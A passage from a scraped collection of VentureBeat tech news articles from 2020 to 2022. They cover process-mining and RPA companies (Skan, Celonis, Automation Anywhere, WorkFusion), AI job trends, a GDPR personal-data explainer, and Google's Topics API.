2022. Skan, the brainchild of entrepreneurs Avinash Misra and Manish Garg, combines data engineering with computer vision to synthesize traces of human and screen interactions, uncovering how workloads (e.g., underwriting, sales, customer onboarding, servicing, claims, invoicing, and fulfillment) are performed in an organization. The platform maps processes by observation on digital systems and continuously infers deep process maps. In production, Skan, which works in the cloud or on-premises and doesn’t require access to backend data, places virtual process agents on desktops and captures digital interactions with Citrix terminals, Excel spreadsheets, browsers, notepads, and more using computer vision. The data are analyzed and synthesized to derive a process metamodel. Via this approach, Skan uncovers process permutations to build a picture from the ground up and generates a definition document, which can help automation engineers plan and build bots fit for purpose. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Skan also creates “digital twins” of end-to-end value streams, or models tailored for data-driven process analyses. To ensure the integrity of these models, Skan says it keeps business data behind enterprise firewalls and anonymizes worker information, as well as “pixel-level” data redaction and masking techniques. In addition, the platform can anonymize worker data. It’s an open question whether the Skan platform’s features are differentiating enough to stand out in a crowded field. FortressIQ , an RPA startup that similarly leverages AI to learn business tasks, recently raised $12 million. FortressIQ and Skan compete with Automation Hero , another well-funded RPA company that recently expanded its focus beyond the sales domain. That’s not to mention Kryon and Blue Prism , or behemoths in the RPA space like UiPath (which is valued at over $1.2 billion) and Automation Anywhere (valued at over $6.8 billion). That said, Skan claims to have nabbed customers “the world over” with a significant footprint in the banking, financial services, and insurance sectors. While it won’t disclose names, the company says large enterprises collectively investing “billions” of dollars are among the early adopters. “We realized that without understanding processes, their variants, and the resulting operational intelligence, any intervention such as digitalization, automation, and optimization are futile,” Misra said. “There’s often a gap between how we think work gets done in the enterprise versus how it works in practice.” Cathay Innovation led San Francisco-based Skan’s $14 million series A with participation from Citi Ventures and existing investors Zetta Ventures, Bloomberg Beta, Plug and Play Ventures, and Firebolt Ventures. It’s the startup’s first publicly disclosed fundraising round since its founding in September 2018. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,124
2,020
"AI jobs in 2021: here are some key trends | VentureBeat"
"https://venturebeat.com/2020/12/28/ai-jobs-in-2021-here-are-some-key-trends"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Sponsored Jobs AI jobs in 2021: here are some key trends Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. There’s no doubt about it – Artificial Intelligence has been a bit of a buzzword this year. Artificial intelligence has been established as the main driver of emerging technologies such as big data, robotics, and the IoT. So, what do the next 12 months look like for AI? As a result of the global pandemic, consumer trends have changed significantly, which has resulted in some notable trends in the world of AI for 2021… Hyperautomation Hyperautomation is the application of advanced technologies like Artificial Intelligence and machine learning to augment workers and automate processes in ways that are significantly more impactful than traditional automation capabilities. Automated business processes must be able to adapt to changing circumstances and respond to unexpected situations, hence the need for AI. This is something we’ll be seeing more of in the new year, no doubt. Ethical AI One of the biggest things we’re expecting in 2021 is a rising demand for the ethical use of Artificial Intelligence. Previously, companies adopted AI and machine learning without a huge amount of thought to the ethics behind them. But now, consumers and employees expect companies to adopt AI in a responsible manner. Over the next number years, companies will deliberately choose to do business with partners that commit to data ethics and adopt data handling practices that reflect their own values as well as their customers’ values. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Workplace AI It is predicted that in 2021, a sizeable number of companies in adaptive and growth mode will look to Artificial Intelligence to help with workplace disruption for both location-based, physical, or human-touch workers and knowledge workers working from home. AI will be used for things like customer service agent augmentation, return-to-work health tracking, and intelligent document extraction. Cybersecurity AI seems to be constantly finding itself wrapped up in the world of cybersecurity, for both corporate; an ongoing trend that’s going nowhere. AI and machine learning technology can be used in cybersecurity to help identify threats, including variants of earlier threats. AI use will expand to create smart homes where the system learns the ways, habits, and preferences of its occupants – improving its ability to identify intruders and protect the home. Does all of this sound super interesting to you? Then maybe you should consider looking for a job in AI. We have so many exciting opportunities available over on our careers page – head over and have a look now! VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,125
2,021
"Celonis investing heavily to build out process-mining platform | VentureBeat"
"https://venturebeat.com/2021/10/20/celonis-investing-heavily-to-build-out-process-mining-platform"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Celonis investing heavily to build out process-mining platform Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Celonis , a Germany-based maker of process-mining tools , has announced several key acquisitions, capabilities, and partnerships involving its core platform. These include the launch of the Celonis Execution Graph, the acquisition of Lenses.io , a maker of streaming data tools, and a partnership with Canada’s Conexiom. Gartner Research has characterized process mining as a core technology for building out the digital twin of an organization. These capabilities allow executives to peer inside business processes, identify inefficiencies, and design more efficient workflows by testing out a twin that doesn’t interfere with operations. These recent moves will make it easier to use graph data and streaming data to extend executable digital twins of an organization across process and even company boundaries. Gartner has identified graph data technology as a core component of data fabrics required to build digital twins that tie together data and simulations across different enterprise applications. Celonis CEO Alexander Rilke told VentureBeat he finds it helpful to characterize their approach as an “X-Ray for your business.” New capabilities coming to process-mining Process mining has traditionally focused on one process at a time. The adoption of graph technology will make it easier to evaluate trade-offs in optimizing different processes simultaneously. The new Celonis Execution Graph uses graph data structures to tie together data from across business processes to see how they influence each other across systems and suppliers. Noteworthy is a new feature, Multi-Event Log, that spots inefficiencies that cross multiple processes. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! IDC VP of Intelligent Process Automation Research, Maureen Fleming told Venture Beat via email, “As organizations successfully use process mining to identify inefficiencies in one process, they often have to investigate upstream processes to find the source of the inefficiency. The effort and time value of visualizing and analyzing the impact of interactions in one process to another through automation rather than manual efforts means the time spent in analysis shrinks and more targeted improvement efforts commence more rapidly.” Celonis also acquired Lenses.io to simplify real-time data integration into process mining, analytics, and low-code application development. Lenses took a novel approach for transforming raw real-time streaming data into clear business events. For example, this could help combine weather patterns, raw material access, and social trends to identify when shipments might be late. Celonis hopes to combine this capability with the low-code business execution technology from Integromat , which it acquired a year ago. Fleming said that event stream processing could increase precision and speed problem identification and opportunity detection. This promises to make process mining data more actionable and the results more controllable. The third major announcement was a partnership with Conexiom, a leader in sales order automation services. The companies plan to collaborate on a touchless order-capture product to make it easier to create business processes that span multiple companies. Getting a leg up in hyper-automation Both RPA (robotic process automation) and process mining represent two popular and complementary approaches for automating and reengineering existing business processes in the larger hyper-automation market. RPA platforms help enterprises create bots that mimic the way humans type and click through various business apps. In contrast, process-mining tools analyze enterprise data logs to identify the most promising automation and reengineering opportunities. RPA and process mining vendors are expanding into each other’s territory to become the gateway for hyper-automation initiatives that accelerate digital transformation. For example, Celonis previously acquired Integromat, which automates low-code development opportunities identified with process mining. Conversely, leading RPA vendors such as UiPath, Automation Anywhere , and Blue Prism also have moved into process mining and process discovery. Microsoft is also expanding into both RPA and process mining. These will help Celonis secure a lead against other process-mining vendors and in the larger market for hyper-automation, which Gartner expects to reach $596 billion in 2022. These moves are part of Celonis’s long-term strategy for growing the market for process mining and execution beyond the hot market for RPA. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,126
2,021
"Automation Anywhere acquires FortressIQ to boost process mining | VentureBeat"
"https://venturebeat.com/2021/12/23/automation-anywhere-acquires-fortressiq-to-boost-process-mining"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Automation Anywhere acquires FortressIQ to boost process mining Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Robotic process automation (RPA) company Automation Anywhere today announced that it’s entered into a definitive agreement to acquire FortressIQ , a startup developing automatic process discovery and mining technologies. With this acquisition of FortressIQ, Automation Anywhere will expand its platform with new optimization capabilities that help to identify which software-based processes in an organization can be automated, according to its COO Mike Micucci. “As two cloud-first companies, we … have common customers who we can help scale their digital transformation efforts and who will benefit from our best-of-breed automation technologies,” he told VentureBeat via email. “We believe our acquisition of FortressIQ makes complete business sense. We are combining the pioneer in intelligent automation with the pioneer in process discovery — a perfect match.” Mihir Shukla will continue as Automation Anywhere’s chairman and CEO. Pankaj Chowdhry, CEO and founder of FortressIQ, will join Automation Anywhere as EVP and general manager for discovery. Robotic process automation The demand for RPA has grown as companies look for ways to streamline businesses processes during the pandemic — and as they adopt new digital technologies. RPA promises to automate monotonous, repetitive tasks traditionally performed by human workers, addressing bottlenecks with workflows, data, and documentation while providing audit trails and reducing compliance expenses (and risks). VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! RPA often begins with what’s called task discovery — process mining — where an RPA client spots root cause issues by pulling data from systems including desktop, IT, email apps, and workflows. Task capture is the next step in the onboarding chain, which comes as employees move through a work process that they’d like to automate. “Automation continues to transcend other technologies as organizations pursue digital transformation initiatives,” Micucci said. “As companies continue on their automation journeys, there’s been tremendous interest from customers around process intelligence to help identify, map, and analyze the multi-dimensional processes that extend across hundreds of apps and thousands of employees, as well as the insight into which processes can and should be automated to drive business success.” FortressIQ’s process-mining product taps AI — specifically computer vision and natural language processing — to “learn” business tasks as they occur in real time by analyzing and transcribing footage from a user’s desktop or laptop. FortressIQ claims that its technology can filter out noise and anonymize the captures to protect privacy. It also doesn’t require APIs, transaction logs, or installation and works with existing free, proprietary, and commercial apps, the company says. Chowdhry got the inspiration for FortressIQ while leading AI at Genpact, a business process outsourcing firm. “We decided to join forces with Automation Anywhere as we thought it was the best way to accelerate our mission to deliver actionable process intelligence. We often heard from customers that one of the hardest problems they encountered was translating a discovered process into an automated one,” he told VentureBeat. “We feel that [Automation Anywhere’s] scale will be transformational for the industry and allow us to turbo charge our customer’s transformation agendas.” Expansion and consolidation Gartner estimates that the market for dedicated process mining tools alone has grown from $110 million in 2018 to more than $320 million today. In a report released last September, analysts at the firm found that the broader RPA market increased at a moderate 19.5%, with total revenue anticipated to reach $2 billion in 2021. Unsurprisingly, major RPA vendors are starting to invest in building out process mining. Automation Anywhere rival UiPath developed some of its own tools before buying Process Gold and StepShot for their process mining capabilities. Blue Prism recently released a task mining solution called Capture, while other vendors including ABBYY and Kryon are slowly expanding their own process mining offerings. “Demand for RPA and intelligent automation has skyrocketed as the pandemic endures and organizations have looked to automation for business resiliency, to support remote workers and streamline business,” Micucci said. “With this acquisition, we will add new capabilities from FortressIQ with built-in intelligence to our automation platform and create a joint roadmap that focuses on making AI-powered process discovery and process intelligence more robust. This will enable customers to speed and scale their automation journey.” But Automation Anywhere’s acquisition comes at a time when the industry appears to be headed toward general consolidation — despite the vast amounts of capital being invested in it. In late January, SAP acquired German process automation company Signavio, just before ServiceNow got into the RPA segment with the buyout of India-based Intellibot.io. In April, IBM acquired process mining software company MyInvenio. Salesforce’s MuleSoft and Microsoft followed suit with the purchases of automation technology providers Servicetrace and Clear Software , respectively. Still, Automation Anywhere rival UiPath — which recently filed to go public — believes the total global RPA market to be around $60 billion currently. In a sliver of supporting evidence, Automation Anywhere claimed last November that it was on track to reach profitability for the first time. “While RPA firms aspire for dominance, exits await Blue Prism, Automation Anywhere, UiPath, WorkFusion and a gallery of other RPA companies,” The Last Futurist’s Michael Spencer wrote in a recent analysis. “Sprawling technology platforms can acquire these RPA startups and turn them into automation software that’s profitable and will rapidly consolidate the entire sector.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,127
2,022
"The Great Resignation gives birth to digital employees powered by AI, ML, and RPA | VentureBeat"
"https://venturebeat.com/2022/02/07/the-great-resignation-gives-birth-to-digital-employees-powered-by-ai-ml-and-rpa"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages The Great Resignation gives birth to digital employees powered by AI, ML, and RPA Share on Facebook Share on X Share on LinkedIn technology and creativity education. (silhouette of virtual human on handwritten equations 3d illustration , represent artificial technology and creativit Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Meet Tara. A transaction screening analyst, Tara has daily tasks that include continuously reviewing alert messages, examining alert reviews and dispositions, cross-referencing messages with third-party tools such as Google or OpenCorporates.com, and tuning systems to improve automation rates. “My role is to make flags on potential risky transactions, whether they come from individuals or institutions,” Tara explains, emphasizing the critical nature of regulatory adherence. “Sanctions are serious business. This is really important work.” Tara is a sophisticated bot — complete with a name, face, personality, CV, and deep industry expertise and experience. She is one of six digital “colleagues” that have been developed and deployed by intelligent automation and robotic process automation (RPA) company WorkFusion. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Welcome to the new digital workforce “Enterprises today in every sector are facing the greatest labor shortage in history, and it’s even more difficult to source, hire, and train knowledge workers who can perform complex jobs that require numerous daily data-driven decisions,” said WorkFusion CEO Adam Famularo. He pointed to the so-called ongoing “Great Resignation,” and, particularly in the insurance and financial sectors, increasing regulatory pressure. Businesses can expand their team’s capacity with “digital colleagues who never get tired, can’t be distracted, and perform flawlessly.” Companies across numerous industries are increasingly relying on digital workers to automate and streamline various tasks — and, in turn, these virtual employees powered by AI, machine learning, RPA , and analytics are becoming even more advanced. According to Forrester’s “Future of Work,” automation will transform 80% of jobs in some way by 2030. More Fortune 1000 Company executives are going to look to AI, bots, robots, and smart technologies to address the employee experience, compensation, and regulatory pressures, Forrester anticipates. WorkFusion is one of a growing number of companies going beyond traditional RPA to meet this demand. Others in the space include Digital Workforce, Thoughtful Automation, and Tangentia. The New York City-based WorkFusion today announced the release of its new AI-powered digital workforce, which uses intelligent automation to work alongside human teams in banking, finance, insurance, and other industries. As Famularo explained, these new “team members” arrive on the job fully trained, are immediately productive, and can work independently or under supervision (what’s known as “human-in-the-loop” interaction). And they are represented with human personification. The company hired actors to represent them, so they all have a face, as well as names, titles, previous work experiences, and extensive lists of complex skills. Prospective customers can view their CVs on WorkFusion’s website and can also watch short videos in which they explain their roles and expertise. According to Famularo, this human portrayal of digital workers was driven by WorkFusion customers. “To be able to have a name and a face makes it easier to interact with them and associate them with the work that they do,” he said. “It is this digital workforce that is going to come to life.” Meet Tara’s AI-powered colleagues In addition to Tara, the company developed Ilana, an insurance underwriter who collects, reviews, and analyzes new business applications, qualifies accounts, and enters quotes into company quoting and rating system as well as Kendrick, a customer ID program analyst who reviews customer identity documents for quality assurance and ensures that proof of identity is captured and entered into company databases. Other digital team members include Evelyn, a sanction screening analyst; Darryl, a customer due diligence program analyst; and Casey, a customer service coordinator. WorkFusion expects to deploy additional digital workers later this year: Carlos, a customer outreach analyst; Isaac, an investigations analyst; Laticia, a lending operations analyst; and Shawn, a sales operations analyst. WorkFusion’s focus on financial services and insurance dictated the initial grouping. “We wanted to make sure we were deep and rich in skill sets specific for financial services and insurance,” he said. The goal is to “go deep and rich with a specific job role, then enable that job role to traverse industries in the future,” Famularo said. These digital workers can be deployed as-is, or companies can customize them so that they are unique to their businesses and processes. One or one hundred Kendricks or Caseys can be integrated into business functions, Famularo said. They are scalable, and their AI core continuously learns and improves with every assignment and interaction. As they work in secure, on-premise, private cloud, managed services cloud, and SaaS environments, the WorkFusion Network allows them to share insights, skills, and knowledge that in turn enables continuous enhancement and updating. The network also aggregates performance results so that companies can assess their effectiveness. “It is a self-learning ecosystem of digital workers,” Famularo said. He emphasized that this virtual workforce supplements human workers by shouldering heavy loads and enabling their human counterparts to tackle more impactful, high-level tasks and projects. Reading and dissecting emails and documents and assessing whether a transaction should be completed or not are “all things we can do better with a digital workforce,” he said. In developing these virtual workers, WorkFusion built upon its decade of experience in automating complex operational functions. Their differentiator, according to Famularo, is that they fully automate an entire job role and leverage deep machine learning to constantly enhance themselves. They can be up and running in a short period of time, increasing time to value while reducing costs, speeding compliance, and enhancing customer and employee experiences. “They are full-scale digital knowledge workers; they can do full work,” Famularo said. As more companies integrate its initial six workers, WorkFusion will continue to fine tune and grow their skillsets and interaction abilities. “It’s this network effect of self-learning: five, six, seven, eight of the same Tara can be working for several companies today,” Famularo said. And as they work, WorkFusion can “gather up intelligence, establish a model behind what they’re doing and how they’re doing it.” More digital employees on the job means that the WorkFusion platform grows smarter and smarter. “Every Evelyn that’s out there is making us better,” Famularo said. Ultimately, “companies are all starved for talent,” he added. The question WorkFusion is striving to answer is this: “How do you use a digital workforce to take the work?” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,128
2,021
"The perils of personal data | VentureBeat"
"https://venturebeat.com/2021/12/15/the-perils-of-personal-data"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community The perils of personal data Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. This article was contributed by Anselmo Diaz, principal consultant, and associate lecturer. Data isn’t new. Since ancient times, people have recorded facts for inventory purposes, to carve events in the annals of history, and for everything else our ancestors deemed to be important. The need to preserve information when coupled with advances in technology has resulted in data becoming ubiquitous in modern societies. In fact, technology makes the creation, processing, and sharing of data such a common activity that people have stopped paying much attention to it. Data explosion Data is everywhere , and we interact with it in numerous diverse ways: credit cards, identification documents, medical records, CCTV footage, digital photographs, emails, social media, and more. The list is truly endless and is constantly expanding with the use of the Internet of Things (IoT), smartphones, and wearable technologies, to name a few. It is estimated that in 2021, the amount of data generated daily surpasses 2.5 quintillion bytes , which is 25 followed by a staggering 17 zeros. Most of that is stored in immense server farms or in the cloud. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Most people right now do not see a problem with their data being spread all over the place, and are also generally unaware of the privacy concerns raised by the current situation. However, identity theft for individuals is notably on the rise, as are data exfiltration and Man in the Middle (MiTM) attacks for organizations. Both are the result of exploiting vulnerabilities to compromise personal data and breach confidentiality, and both can be prevented or mitigated by judicious application of data protection principles. Data: It’s personal Personal data is a subset of data that relates to individuals. It has been in the spotlight since the advent of the GDPR in 2018. Since then, other pieces of legislation have been adopted across the globe, including in China (PIPL), Brazil (LGPD), and California (CCPA). These legislative efforts have one common objective: to provide a framework to protect personal data. The GDPR defines personal data as, “Any information relating to an identified or identifiable natural person (‘data subject’); an identifiable natural person is one who can be identified, directly or indirectly, in particular by reference to an identifier such as a name, an identification number, location data, an online identifier or to one or more factors specific to the physical, physiological, genetic, mental, economic, cultural or social identity of that natural person.” This concept of personal data, understood in a broad sense, is shared across the aforementioned laws. Given that most of these have provisions for cross-border transfers, chances are your organization falls within the scope of one jurisdiction or another when it comes to the processing and protection of personal data. Examples of personal data include: Definition differences Personally Identifiable Information (PII) and personal data are not the same One word of caution: although often erroneously used interchangeably, Personally Identifiable Information (PII) and personal data are not the same. Personal data also encompasses information that can point indirectly to an individual, whereas PII, a term mostly used in the U.S., is narrower and points directly to an individual. For instance, “the red-haired woman who sat by the window” could constitute personal data if it helps identify a single person. Notice how, in this example, there is probably no need to obtain a name or a number. Some ambiguity is at play, though, which is largely dependent on context. The context in this sense would combine different data items like pieces of a puzzle. This can be achieved with information from different sources that can be aggregated in such a way as to make an inference. Another example of the role context plays would be a random sequence of digits, which is not personal data unless those digits are associated with an individual’s telephone number and the connection between an individual and telephone number could be established. It follows that any PII can be considered personal data, but not vice versa. Data vs personal data vs special categories of data We have seen how data differs from personal data, but there is another important data type: special category data. These three types can be represented in a diagram: Unlike personal data, special category data is clearly defined in a prescriptive manner under Article 9 of the GDPR , and consists of: Data mapping and data classification It is critical to know the personal data your organization handles and map how that personal data is processed , stored, transmitted, and ultimately deleted. This will help adapt your organizational and technical measures to protect the personal data according to their associated risk and prioritize wisely. This can be achieved either one of two ways: Performing a data inventory, which consists of creating a record of the data that enters, resides in, or exits your organization Performing a Record of Processing Activities (RoPA), which is similar to data inventory, but focuses on the activities (read ‘flows of data’), rather than specifying each data element. It suggests a lesser effort but by no means a negligible one. Data classification will categorize the data in several compartments. For commercial organizations, a typical classification scheme is composed of: strictly confidential confidential personal internal use only public These issues can be considered two sides of the same coin, as data inventory/RoPA without data classification is not particularly useful, and data classification without data inventory/RoPA just cannot take place. Where to find personal data To support your search for personal data, it is a good idea to have an asset inventory first, that way it becomes easier to determine the data that may be circulating through these devices. Regardless, these are some locations to examine: Personal data can be in digital form and in physical form as part of a filling system. Personal data can be found in structured or unstructured databases. Data lakes and data warehouses often have copious amounts of personal data. Web forms used on your website or in any other method of communicating with your customers Cookies and related technologies deployed in your website and, in particular, those by third parties if present. Shared drivers used internally, particularly those with access from external parties Email inboxes Bring Your Own Device (BYOD) phones, including SIM card, and internal memory Removable media such as USB drives, CDs, DVDs Dormant accounts, with usernames and other data HR records Accident books containing health-related data As part of digitalization, I have seen many organizations struggle with data previously (or concurrently) stored in physical form. Filing cabinets in an office environment used to store all sorts of paper documents, including passport scans, are still quite common. Their bigger brother is the ‘data vault,’ which is an entire room dedicated to storing printouts. These pose a high risk to the organization and an unknown risk as normally, the data is just dumped there without any form of consideration. The amount of effort and time required to categorize these documents can be daunting, and the process is prone to errors if attempted using a ‘speedy’ approach. Tools exist to aid with the data discovery exercise, but a good policy needs to be in place to ensure newly acquired data is appropriately labeled and safely stored. This looks like a lot of effort, why bother? The consequences of not protecting personal data , which as we have seen requires knowledge of where the data is and what it is, could be severe and can be framed as follows: In case an event was to occur, a security incident involving personal data constitutes a data breach, and may mandate notification and reporting to supervisory authorities and data subjects, depending on the extent of the breach. Although personal data is pervasive and perceived as a commodity, it has been elevated by data-protection laws worldwide to something that needs to be handled with care. Organizations must be wary of applicable laws and act in accordance with them to avoid nasty surprises that may impact their business objectives. Anselmo Diaz is an experienced principal consultant and associate lecturer with an extensive academic background in law, information security, and engineering, including globally recognized certifications such as Fellow of Information Privacy (FIP), CIPP/E, CIPM, CIPT, CDPSE, and CISSP. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,129
2,022
"Google Privacy Sandbox Initiative ushers in interest-based advertising with Topics API | VentureBeat"
"https://venturebeat.com/2022/01/25/google-privacy-sandbox-initiative-ushers-in-interest-based-advertising-with-topics-api"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Google Privacy Sandbox Initiative ushers in interest-based advertising with Topics API Share on Facebook Share on X Share on LinkedIn FILE PHOTO: The brand logo of Alphabet Inc's Google is seen outside the company's office in Beijing, China, August 8, 2018. Picture taken with a fisheye lens. REUTERS/Thomas Peter Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Today, Google’s Privacy Sandbox initiative, which is designed to improve web privacy for users, announced the launch of the Topics API for interest-based advertising. The API enables a user’s web browser to analyze their browsing history and determine what topics represent their top interests. Then, once the user visits a website, the Topics API will select three of those topics to share with the site and its advertising partners. The web browser can only store topics for a maximum of three weeks, and Google Chrome users will have the option to view the topics associated with them, remove them, or to disable the feature completely. The announcement comes ahead of Google’s plan to phase out third-party cookies on Chrome, and will give consumers greater control over their data by storing it on their local device, while still ensuring that advertisers have access to sufficient information to deliver a relevant experience. As a result, after years of using third-party cookies to track visitors and collect data to produce targeted ads, technical decision makers and organizations will need to gather insights from the Topics API’s collected interests if they want to effectively promote products and services to Chrome users. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Moving away from third-party cookies to interest-based advertising The announcement comes amid consumer concerns over how marketers use their data. Last year, a poll found that 55% of Americans say they are not very, or at all, comfortable sharing their personal data in exchange for a better website experience, with 37% saying they are very concerned about how websites use their personal data. The Google Privacy Sandbox initiative and now the Topics API are aiming to address these challenges by giving consumers more control over what information they share with advertisers, so they can better maintain their privacy online. “Our vision for the Privacy Sandbox hasn’t changed. We want to enable a sustainable advertising ecosystem for the open web with strong privacy protections for users. This vision has the greatest chance of success if we work with the ads ecosystem to make this fundamental shift in manageable stages, introducing new technologies that can replace cross-site tracking methods, learning what works and where we can make improvements, and enforcing stronger privacy protections over time,” a spokesperson for Google commented. Topics attempts to offer less intrusive data collection for 